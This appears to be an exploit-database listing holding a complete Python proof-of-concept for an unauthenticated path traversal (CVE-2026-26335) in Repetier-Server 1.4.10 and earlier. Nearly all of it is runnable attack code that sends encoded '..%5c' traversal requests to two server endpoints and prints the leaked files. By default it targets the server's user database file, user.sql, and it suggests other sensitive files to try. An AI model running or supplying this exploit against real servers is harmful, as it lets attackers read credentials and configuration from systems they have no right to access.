Share
## https://sploitus.com/exploit?id=PACKETSTORM:220384
# Exploit Title:    Repetier-Server 1.4.10 - Path Traversal 
    # Exploit Author:   Mohammed Idrees Banyamer
    # Vendor Homepage:  https://www.repetier.com/
    # Version:          <= 1.4.10
    # Tested on:        Windows 10 / Windows Server 2019 (Repetier-Server default install)
    # CVE:              CVE-2026-26335
    # Advisory:         https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
    # CVSS:             9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    
    import requests
    import argparse
    import sys
    from urllib.parse import urljoin
    
    
    def generate_traversal(depth: int = 15) -> str:
        return "..%5c" * depth
    
    
    def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
        traversal = generate_traversal(traversal_depth)
    
        payloads = [
            f"views{traversal}{file_path}/base/connectionLost.php",
            f"base/connectionLost.php?file={traversal}{file_path}",
        ]
    
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Attempting to read: {file_path}")
        print(f"[*] Traversal depth: {traversal_depth}")
    
        for payload in payloads:
            exploit_url = urljoin(target_url.rstrip("/") + "/", payload)
    
            try:
                print(f"  โ†’ Trying: {exploit_url}")
                r = requests.get(exploit_url, timeout=timeout, verify=False)
    
                if r.status_code == 200 and len(r.content) > 60:
                    sample = r.text[:500].replace("\n", " ").strip()
                    print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)")
                    print(f"    Preview:\n    {sample}...")
                    return True
                else:
                    print(f"  โ†’ Failed (status {r.status_code}, size {len(r.content)})")
    
            except requests.RequestException as e:
                print(f"  โ†’ Error: {e}")
    
        return False
    
    
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI"
        )
        parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
        parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql",
                            help="File path to read (use Windows \\ separator)")
        parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
        parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")
    
        args = parser.parse_args()
    
        if args.test:
            args.file = "Windows\\win.ini"
            print("[i] Running test mode โ†’ targeting Windows\\win.ini")
    
        file_path = args.file.replace("\\", "%5c")
    
        print("=" * 70)
        print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
        print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
        print("=" * 70, "\n")
    
        success = attempt_read(args.target, file_path, args.depth)
    
        if not success:
            print("\n[!] Exploitation attempt failed.")
            print("Suggestions:")
            print("  โ€ข Increase --depth (try 18โ€“30)")
            print("  โ€ข Verify target is running Repetier-Server <=1.4.10")
            print("  โ€ข Try alternative interesting files:")
            print("      - ProgramData%5cRepetier-Server%5cconfig.xml")
            print("      - Windows%5csystem32%5cdrivers%5cetc%5chosts")
    
    
    if __name__ == "__main__":
        main()